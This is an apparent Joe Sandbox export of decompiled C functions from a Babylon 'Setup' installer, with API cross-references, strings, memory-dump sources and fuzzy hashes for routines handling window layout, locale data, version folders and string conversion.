                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004CC800(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                              
                                                                                                                                                              				if(( *0x5c1ed0 & 0x0000ffff) == 0) {
                                                                                                                                                              					if(E004C5660(0xf, 0) != 1) {
                                                                                                                                                              						E004F8180(__ebx, 0x5be0a0, __edi, __esi, 0x5c1ed0, 0x1b, L"BabylonData.html");
                                                                                                                                                              						if(( *0x5c1ed0 & 0x0000ffff) == 0) {
                                                                                                                                                              							E0045184A(0x5c1ed0, L"c:\\temp\\BabylonData.html");
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						E0045184A(0x5c1ed0, L"www.babylon.com/ClientData.html");
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return 0x5c1ed0;
                                                                                                                                                              			}




                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • BabylonData.html, xrefs: 004CC833
                                                                                                                                                              • www.babylon.com/ClientData.html, xrefs: 004CC81F
                                                                                                                                                              • c:\temp\BabylonData.html, xrefs: 004CC854
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcscpy
                                                                                                                                                              • String ID: BabylonData.html$c:\temp\BabylonData.html$www.babylon.com/ClientData.html
                                                                                                                                                              • API String ID: 3048848545-2817021312
                                                                                                                                                              • Opcode ID: 302cb4f288442af32d7dc266d49bd033a5520ec215228117e118cdd053b920fb
                                                                                                                                                              • Instruction ID: 680570e49307a0ca327cc94fd27d678254eafae66515bd49608ecbf4d387509a
                                                                                                                                                              • Opcode Fuzzy Hash: 302cb4f288442af32d7dc266d49bd033a5520ec215228117e118cdd053b920fb
                                                                                                                                                              • Instruction Fuzzy Hash: 16E01C74B8170865D66436832C43F262D492721FCAF08043EF90AA82C3E9DDD644116E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E004CDBD0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				intOrPtr _v68;
                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                              				struct HMENU__* _v76;
                                                                                                                                                              				char _v108;
                                                                                                                                                              				char _v109;
                                                                                                                                                              				intOrPtr _v116;
                                                                                                                                                              				signed int _v120;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				signed int _t105;
                                                                                                                                                              				void* _t134;
                                                                                                                                                              				void* _t139;
                                                                                                                                                              				void* _t143;
                                                                                                                                                              				void* _t166;
                                                                                                                                                              				void* _t172;
                                                                                                                                                              				void* _t252;
                                                                                                                                                              				char* _t259;
                                                                                                                                                              				void* _t269;
                                                                                                                                                              				void* _t270;
                                                                                                                                                              				signed int _t277;
                                                                                                                                                              
                                                                                                                                                              				_t269 = __edi;
                                                                                                                                                              				_t252 = __edx;
                                                                                                                                                              				_t172 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50f2b6);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t270);
                                                                                                                                                              				_t105 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t105 ^ _t277);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v116 = __ecx;
                                                                                                                                                              				E00434E30( &_v64);
                                                                                                                                                              				E00416B80( &_v36);
                                                                                                                                                              				if((E00404730(0x5c1160, 0xffffffff) & 0x000000ff) != 0) {
                                                                                                                                                              					E0042E600(_v116 + 4, 0, 0x400000, 0);
                                                                                                                                                              				}
                                                                                                                                                              				E004CD1E0(_t172, _v116, _t269, _t270,  &_v64);
                                                                                                                                                              				asm("cdq");
                                                                                                                                                              				E004CD430(_v116 + 0x20,  *((intOrPtr*)(_v116 + 4)), 0xc, (_v60 - _t252 >> 1) + 4);
                                                                                                                                                              				if((E00416630(_v116 + 0x70) & 0x000000ff) != 0) {
                                                                                                                                                              					_t166 = E00434050( &_v109);
                                                                                                                                                              					E00417910(E00403C30(0x5be390), _t166);
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004181D0(_v116 + 0x6c,  &_v108);
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              				}
                                                                                                                                                              				E004161C0(_v116 + 4, E00416A30(_v116 + 0x70));
                                                                                                                                                              				E0042E8D0(_v116 + 4, E0042E0E0(0x5c1160), 1);
                                                                                                                                                              				_v68 = E004CD9E0(_t172, _v116 + 0x8c, _t269, _t270,  *((intOrPtr*)(_v116 + 4)), 0x14b);
                                                                                                                                                              				_v52 = E004CD9E0(_t172, _v116 + 0xa4, _t269, _t270,  *((intOrPtr*)(_v116 + 4)), 0x14c);
                                                                                                                                                              				_v40 = E004CD9E0(_t172, _v116 + 0xbc, _t269, _t270,  *((intOrPtr*)(_v116 + 4)), 0x14d);
                                                                                                                                                              				if(_v40 == 0) {
                                                                                                                                                              					_v120 = 0 | _v52 != 0x00000000;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v120 = 2;
                                                                                                                                                              				}
                                                                                                                                                              				_v48 = _v68 + _v52 + _v40 + _v120 * 0xa;
                                                                                                                                                              				_v44 = E0042E680(_v48 + 0x18, _v48 + 0x18, _v64 + 0x50);
                                                                                                                                                              				_t134 = E0042E0C0(_v116 + 0x8c);
                                                                                                                                                              				_v56 = _t134 + _v60 + GetSystemMetrics(4) + 0x42;
                                                                                                                                                              				E00416C20(_v116 + 4, 0, 0, 0, _v44, _v56, 6);
                                                                                                                                                              				_t259 =  &_v36;
                                                                                                                                                              				E00416BC0(_v116 + 4, _t259);
                                                                                                                                                              				_t139 = E00419D10( &_v36);
                                                                                                                                                              				asm("cdq");
                                                                                                                                                              				_v20 = _t139 - _v48 - _t259 >> 1;
                                                                                                                                                              				_t143 = E00419D30( &_v36);
                                                                                                                                                              				_v72 = _t143 - 0x14 - E0042E0C0(_v116 + 0x8c);
                                                                                                                                                              				E004CD0F0(_v116 + 0x8c, _v20, _v72);
                                                                                                                                                              				if(_v52 != 0) {
                                                                                                                                                              					_t72 = _v68 + 0xa; // 0x11a
                                                                                                                                                              					_v20 = _v20 + _t72;
                                                                                                                                                              					E004CD0F0(_v116 + 0xa4, _v20, _v72);
                                                                                                                                                              				}
                                                                                                                                                              				if(_v40 != 0) {
                                                                                                                                                              					_t81 = _v52 + 0xa; // 0x11a
                                                                                                                                                              					_v20 = _v20 + _t81;
                                                                                                                                                              					E004CD0F0(_v116 + 0xbc, _v20, _v72);
                                                                                                                                                              				}
                                                                                                                                                              				if( *((intOrPtr*)(_v116 + 0xd4)) != 0) {
                                                                                                                                                              					_v76 = E0042E510(_v116 + 4, 0);
                                                                                                                                                              					EnableMenuItem(_v76, 0xf060, 1);
                                                                                                                                                              					RemoveMenu(_v76, 0xf060, 0);
                                                                                                                                                              				}
                                                                                                                                                              				E00415CA0(_v116 + 4, 0);
                                                                                                                                                              				if(( *(_v116 + 0xd8) & 0x00010000) != 0) {
                                                                                                                                                              					E004965D0( *((intOrPtr*)(_v116 + 4)), 1, 0);
                                                                                                                                                              				}
                                                                                                                                                              				if(( *(_v116 + 0xd8) & 0x00040000) != 0) {
                                                                                                                                                              					E00416C20(_v116 + 4, 0xffffffff, 0, 0, 0, 0, 3);
                                                                                                                                                              				}
                                                                                                                                                              				MessageBeep(E0042E070(_v116 + 0x20));
                                                                                                                                                              				E0042E530(_v116 + 0x8c, 0, 1, 0);
                                                                                                                                                              				E00415F30(_v116 + 0x8c);
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return 0;
                                                                                                                                                              			}

































                                                                                                                                                              0x004cdf07
                                                                                                                                                              0x004cdf1c
                                                                                                                                                              0x004cdf2a
                                                                                                                                                              0x004cdf34
                                                                                                                                                              0x004cdf40

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 004CDBFC
                                                                                                                                                                • Part of subcall function 0042E600: GetWindowLongW.USER32(?,000000EC), ref: 0042E611
                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004CDD92
                                                                                                                                                                • Part of subcall function 00416C20: SetWindowPos.USER32(00000001,?,00000001,00000005,004044DF,?,?,?,?,004EFD0C,00000000,00000000,00000000,00000005,?,00000004), ref: 00416C45
                                                                                                                                                                • Part of subcall function 00416BC0: GetClientRect.USER32 ref: 00416BD1
                                                                                                                                                              • EnableMenuItem.USER32 ref: 004CDE8B
                                                                                                                                                              • RemoveMenu.USER32(?,0000F060,00000000), ref: 004CDE9C
                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 004CDF07
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MenuWindow$BeepClientEnableItemIterator_baseIterator_base::_LongMessageMetricsRectRemoveSystemstd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3709759844-0
                                                                                                                                                              • Opcode ID: d18e896ed6cc584995477ae8e3a215a032c5fbb3674882c8c2e3b7c3441ed65e
                                                                                                                                                              • Instruction ID: e35076c34520df2c1742b85c3f81cfe91c87fcedef95cc6cbe397c04628284e5
                                                                                                                                                              • Opcode Fuzzy Hash: d18e896ed6cc584995477ae8e3a215a032c5fbb3674882c8c2e3b7c3441ed65e
                                                                                                                                                              • Instruction Fuzzy Hash: 13B13C71A101189BEB28DBE9DC91FEEB775FF44308F24412DE106BB2C2DA746941CB68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                              			E0045A8FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                              				signed int _t15;
                                                                                                                                                              				LONG* _t21;
                                                                                                                                                              				long _t23;
                                                                                                                                                              				void* _t31;
                                                                                                                                                              				LONG* _t33;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				void* _t35;
                                                                                                                                                              
                                                                                                                                                              				_t35 = __eflags;
                                                                                                                                                              				_t29 = __edx;
                                                                                                                                                              				_t25 = __ebx;
                                                                                                                                                              				_push(0xc);
                                                                                                                                                              				_push(0x544558);
                                                                                                                                                              				E00456860(__ebx, __edi, __esi);
                                                                                                                                                              				_t31 = E00457400(__ebx, __edx, __edi, _t35);
                                                                                                                                                              				_t15 =  *0x56195c; // 0xfffffffe
                                                                                                                                                              				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                              					E00457DFC(_t25, 0xd);
                                                                                                                                                              					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                              					_t33 =  *(_t31 + 0x68);
                                                                                                                                                              					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                              					__eflags = _t33 -  *0x561860; // 0x2161670
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						__eflags = _t33;
                                                                                                                                                              						if(_t33 != 0) {
                                                                                                                                                              							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                              							__eflags = _t23;
                                                                                                                                                              							if(_t23 == 0) {
                                                                                                                                                              								__eflags = _t33 - 0x561438;
                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                              									_push(_t33);
                                                                                                                                                              									E0044FAFC(_t25, _t31, _t33, __eflags);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t21 =  *0x561860; // 0x2161670
                                                                                                                                                              						 *(_t31 + 0x68) = _t21;
                                                                                                                                                              						_t33 =  *0x561860; // 0x2161670
                                                                                                                                                              						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                              						InterlockedIncrement(_t33);
                                                                                                                                                              					}
                                                                                                                                                              					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                              					E0045A99A();
                                                                                                                                                              				} else {
                                                                                                                                                              					_t33 =  *(_t31 + 0x68);
                                                                                                                                                              				}
                                                                                                                                                              				if(_t33 == 0) {
                                                                                                                                                              					E00457948(_t29, _t31, 0x20);
                                                                                                                                                              				}
                                                                                                                                                              				return E004568A5(_t33);
                                                                                                                                                              			}











                                                                                                                                                              APIs
                                                                                                                                                              • __getptd.LIBCMT ref: 0045A90B
                                                                                                                                                                • Part of subcall function 00457400: __getptd_noexit.LIBCMT ref: 00457403
                                                                                                                                                                • Part of subcall function 00457400: __amsg_exit.LIBCMT ref: 00457410
                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0045A92B
                                                                                                                                                              • __lock.LIBCMT ref: 0045A93B
                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0045A958
                                                                                                                                                              • InterlockedIncrement.KERNEL32(02161670), ref: 0045A983
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4271482742-0
                                                                                                                                                              • Opcode ID: e37120ae664283ea350632c9a41c2ae7b57840983f05399925188644f34e3bfb
                                                                                                                                                              • Instruction ID: 4086997c604cd4e60cdccecd4fb249213bd39f50572aee95531a34e2fe0cb1c3
                                                                                                                                                              • Opcode Fuzzy Hash: e37120ae664283ea350632c9a41c2ae7b57840983f05399925188644f34e3bfb
                                                                                                                                                              • Instruction Fuzzy Hash: 76010871901B25DBDB11AB2A940136E77A0BF00716F16061BEC00A7362C77C586DDBDF
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E0048C630(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v44;
                                                                                                                                                              				signed int _v48;
                                                                                                                                                              				signed int _v52;
                                                                                                                                                              				WCHAR* _v56;
                                                                                                                                                              				signed int _v60;
                                                                                                                                                              				signed int _v61;
                                                                                                                                                              				char _v96;
                                                                                                                                                              				char _v124;
                                                                                                                                                              				char _v128;
                                                                                                                                                              				char _v132;
                                                                                                                                                              				intOrPtr _v136;
                                                                                                                                                              				intOrPtr _v140;
                                                                                                                                                              				signed int _t58;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				void* _t64;
                                                                                                                                                              				signed int _t70;
                                                                                                                                                              				signed int _t81;
                                                                                                                                                              				void* _t89;
                                                                                                                                                              				signed int _t140;
                                                                                                                                                              				void* _t141;
                                                                                                                                                              				void* _t143;
                                                                                                                                                              				void* _t145;
                                                                                                                                                              
                                                                                                                                                              				_t139 = __esi;
                                                                                                                                                              				_t138 = __edi;
                                                                                                                                                              				_t96 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50d1f3);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t58 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t58 ^ _t140);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				E00405140(_a4 + 4);
                                                                                                                                                              				_t63 = E0048BD40(__ebx, __edi, __esi, __eflags, _a4);
                                                                                                                                                              				_t143 = _t141 - 0x7c + 4;
                                                                                                                                                              				if(_t63 == 0) {
                                                                                                                                                              					L16:
                                                                                                                                                              					__eflags = _a4 + 4;
                                                                                                                                                              					_t64 = E0042E0C0(_a4 + 4);
                                                                                                                                                              					 *[fs:0x0] = _v16;
                                                                                                                                                              					return _t64;
                                                                                                                                                              				}
                                                                                                                                                              				E0041F190( &_v28);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					_v132 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v132 = _a4 + 4;
                                                                                                                                                              				}
                                                                                                                                                              				_v136 = E004098D0( &_v124, _v132, "*");
                                                                                                                                                              				_v140 = _v136;
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				E00409810(_v140);
                                                                                                                                                              				_v8 = 2;
                                                                                                                                                              				_t70 = E0049F0E0(_t96, _t138, _t139,  &_v96,  &_v28);
                                                                                                                                                              				_t145 = _t143 + 0x14;
                                                                                                                                                              				_v61 = _t70;
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E004178C0( &_v124);
                                                                                                                                                              				_t149 = _v61 & 0x000000ff;
                                                                                                                                                              				if((_v61 & 0x000000ff) == 0) {
                                                                                                                                                              					L15:
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0041F210();
                                                                                                                                                              					goto L16;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v36 = 0;
                                                                                                                                                              					E0041F270( &_v28,  &_v40);
                                                                                                                                                              					while((E00434020( &_v40, _t149, E00407DE0( &_v28,  &_v128)) & 0x000000ff) != 0) {
                                                                                                                                                              						_t81 = GetFileAttributesW(E00416A30(E00422A60( &_v40) + 4));
                                                                                                                                                              						_t149 = _t81 & 0x00000010;
                                                                                                                                                              						if((_t81 & 0x00000010) != 0) {
                                                                                                                                                              							_v56 = PathFindFileNameW(E00416A30(E00422A60( &_v40) + 4));
                                                                                                                                                              							_push( &_v44);
                                                                                                                                                              							_push( &_v60);
                                                                                                                                                              							_push( &_v48);
                                                                                                                                                              							_t89 = E00452133(_v56, L"%d.%d.%d.%d",  &_v52);
                                                                                                                                                              							_t145 = _t145 + 0x18;
                                                                                                                                                              							__eflags = _t89 - 4;
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								_v32 = _v60 * 0x3e8 + _v44 + _v48 * 0xf4240 + _v52 * 0x5f5e100;
                                                                                                                                                              								__eflags = _v32 - _v36;
                                                                                                                                                              								if(__eflags > 0) {
                                                                                                                                                              									E004181D0(_a4, E00433FA0( &_v40));
                                                                                                                                                              									_v36 = _v32;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						E00422A80( &_v40);
                                                                                                                                                              					}
                                                                                                                                                              					goto L15;
                                                                                                                                                              				}
                                                                                                                                                              			}
































                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 0048C760
                                                                                                                                                              • PathFindFileNameW.SHLWAPI(00000000,?,?), ref: 0048C780
                                                                                                                                                              • _swscanf.LIBCMT ref: 0048C7A2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesFindNamePath_swscanf
                                                                                                                                                              • String ID: %d.%d.%d.%d
                                                                                                                                                              • API String ID: 1908479623-3491811756
                                                                                                                                                              • Opcode ID: 0ece26ce34b65153544ddba81e43c920b0dee0c3efa5f77aaf85a5df5da8da75
                                                                                                                                                              • Instruction ID: d6455b66e45acc822c30ab2818c2ba454160a257f257a69446c1519ea5a7681a
                                                                                                                                                              • Opcode Fuzzy Hash: 0ece26ce34b65153544ddba81e43c920b0dee0c3efa5f77aaf85a5df5da8da75
                                                                                                                                                              • Instruction Fuzzy Hash: AC518371D001089BDF04EFA5D991BEEBBB5EF54304F14856EE502B7281EB38AA45CB68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E0042F090(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, unsigned int _a4, intOrPtr _a8) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				unsigned int _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				unsigned int _v36;
                                                                                                                                                              				signed int _v40;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                              				intOrPtr _v68;
                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                              				void* _v76;
                                                                                                                                                              				signed int _t68;
                                                                                                                                                              				signed int _t69;
                                                                                                                                                              				void* _t74;
                                                                                                                                                              				void* _t89;
                                                                                                                                                              				intOrPtr _t94;
                                                                                                                                                              				intOrPtr _t101;
                                                                                                                                                              				intOrPtr _t133;
                                                                                                                                                              				signed int _t135;
                                                                                                                                                              				void* _t136;
                                                                                                                                                              				void* _t137;
                                                                                                                                                              				intOrPtr _t138;
                                                                                                                                                              				intOrPtr _t140;
                                                                                                                                                              
                                                                                                                                                              				_t134 = __esi;
                                                                                                                                                              				_t133 = __edi;
                                                                                                                                                              				_t101 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x516c98);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t137 = _t136 - 0x38;
                                                                                                                                                              				_t68 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t69 = _t68 ^ _t135;
                                                                                                                                                              				_v40 = _t69;
                                                                                                                                                              				_push(_t69);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v48 = __ecx;
                                                                                                                                                              				_v32 = E00417320();
                                                                                                                                                              				E00413100( &_v20);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if(_a8 != 0xfde9) {
                                                                                                                                                              					_v36 = _a4;
                                                                                                                                                              					__eflags = _v36;
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						_t74 = E00451E10(_v36);
                                                                                                                                                              						_t138 = _t137 + 4;
                                                                                                                                                              						_v24 = _t74 + 1;
                                                                                                                                                              						_t41 =  &_v24; // 0x43573f
                                                                                                                                                              						__eflags =  *_t41 << 1 - 0x10000;
                                                                                                                                                              						if( *_t41 << 1 <= 0x10000) {
                                                                                                                                                              							_t45 =  &_v24; // 0x43573f
                                                                                                                                                              							__eflags =  *_t45 << 1;
                                                                                                                                                              							E00462F60( *_t45 << 1);
                                                                                                                                                              							_v72 = _t138;
                                                                                                                                                              							_v68 = _v72;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t42 =  &_v24; // 0x43573f
                                                                                                                                                              							_v68 = E0041BA30( &_v20, __esi,  *_t42 << 1);
                                                                                                                                                              						}
                                                                                                                                                              						_t50 =  &_v24; // 0x43573f
                                                                                                                                                              						_v64 = E0042F040(_v68, _v68, _v36,  *_t50, _a8);
                                                                                                                                                              					} else {
                                                                                                                                                              						_v64 = 0;
                                                                                                                                                              					}
                                                                                                                                                              					E0041EDA0(_v48, __eflags, _v64);
                                                                                                                                                              					 *((intOrPtr*)(_v48 + 0x20)) = _a8;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v36 = _a4;
                                                                                                                                                              					_t143 = _v36;
                                                                                                                                                              					if(_v36 != 0) {
                                                                                                                                                              						_t89 = E00451E10(_v36);
                                                                                                                                                              						_t140 = _t137 + 4;
                                                                                                                                                              						_t14 = _t89 + 2; // 0x2
                                                                                                                                                              						_v24 = _t89 + _t14;
                                                                                                                                                              						__eflags = _v24 - 0x10000;
                                                                                                                                                              						if(_v24 <= 0x10000) {
                                                                                                                                                              							E00462F60(_v24);
                                                                                                                                                              							_v60 = _t140;
                                                                                                                                                              							_v56 = _v60;
                                                                                                                                                              						} else {
                                                                                                                                                              							_v56 = E0041BA30( &_v20, __esi, _v24);
                                                                                                                                                              						}
                                                                                                                                                              						_v28 = _v56;
                                                                                                                                                              						__eflags = _v24 >> 1;
                                                                                                                                                              						_t94 = E0041BBD0(_t133, _v36, _v28, _v24 >> 1);
                                                                                                                                                              						_t137 = _t140 + 0xc;
                                                                                                                                                              						_v52 = _t94;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v52 = 0;
                                                                                                                                                              					}
                                                                                                                                                              					E0041EDA0(_v48, _t143, _v52);
                                                                                                                                                              					 *((intOrPtr*)(_v48 + 0x20)) = E0041B5F0(_v48 + 4, E00416A30(_v48 + 4));
                                                                                                                                                              				}
                                                                                                                                                              				_v44 = _v48;
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				E004351A0( &_v20);
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_v44, _t101, _v40 ^ _t135, _v48, _t133, _t134);
                                                                                                                                                              			}
































                                                                                                                                                              0x0042f12f
                                                                                                                                                              0x0042f110
                                                                                                                                                              0x0042f11c
                                                                                                                                                              0x0042f11c
                                                                                                                                                              0x0042f135
